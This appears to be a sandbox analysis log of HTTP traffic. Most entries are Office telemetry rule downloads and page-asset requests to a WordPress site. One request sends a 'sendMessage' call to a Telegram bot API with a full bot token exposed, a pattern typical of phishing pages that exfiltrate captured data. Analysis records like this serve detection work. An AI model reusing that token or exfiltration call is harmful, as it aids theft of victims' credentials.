          Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /bot7615492389:AAFVZ9OmchXY56FM3hDvp-X0kY0cMmXg2qE/sendMessage HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-emoji-release.min.js?ver=6.1.7 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-includes/css/dist/block-library/style.min.css?ver=6.1.7 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-includes/css/classic-themes.min.css?ver=1 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/css/font-awesome-legacy.min.css?ver=4.7.1 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/css/build/grid-system.css?ver=15.0.6 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/css/build/style.css?ver=15.0.6 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/css/build/header/header-secondary-nav.css?ver=15.0.6 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-emoji-release.min.js?ver=6.1.7 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/css/build/elements/element-testimonial.css?ver=15.0.6 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/css/build/elements/element-clients.css?ver=15.0.6 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/css/build/elements/element-fancy-unordered-list.css?ver=15.0.6 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/css/build/elements/element-milestone.css?ver=15.0.6 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/css/build/plugins/caroufredsel.css?ver=15.0.6 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/css/build/elements/element-button-legacy.css?ver=15.0.6 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/css/build/responsive.css?ver=15.0.6 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/css/build/skin-material.css?ver=15.0.6 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/salient/menu-dynamic.css?ver=26058 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/plugins/js_composer_salient/assets/css/js_composer.min.css?ver=6.9.1 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/css/salient-dynamic-styles.css?ver=53858 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient-child/style.css?ver=15.0.6 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery.min.js?ver=3.6.1 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/02/logo-COLOUR.png HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/02/mission-blue.png HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/css/fonts/fontawesome-webfont.woff?v=4.2 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.itnaledi.co.zasec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.itnaledi.co.za/wp-content/themes/salient/css/font-awesome-legacy.min.css?ver=4.7.1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/css/fonts/icomoon.woff?v=1.3 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.itnaledi.co.zasec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.itnaledi.co.za/wp-content/themes/salient/css/build/style.css?ver=15.0.6Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery.min.js?ver=3.6.1 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
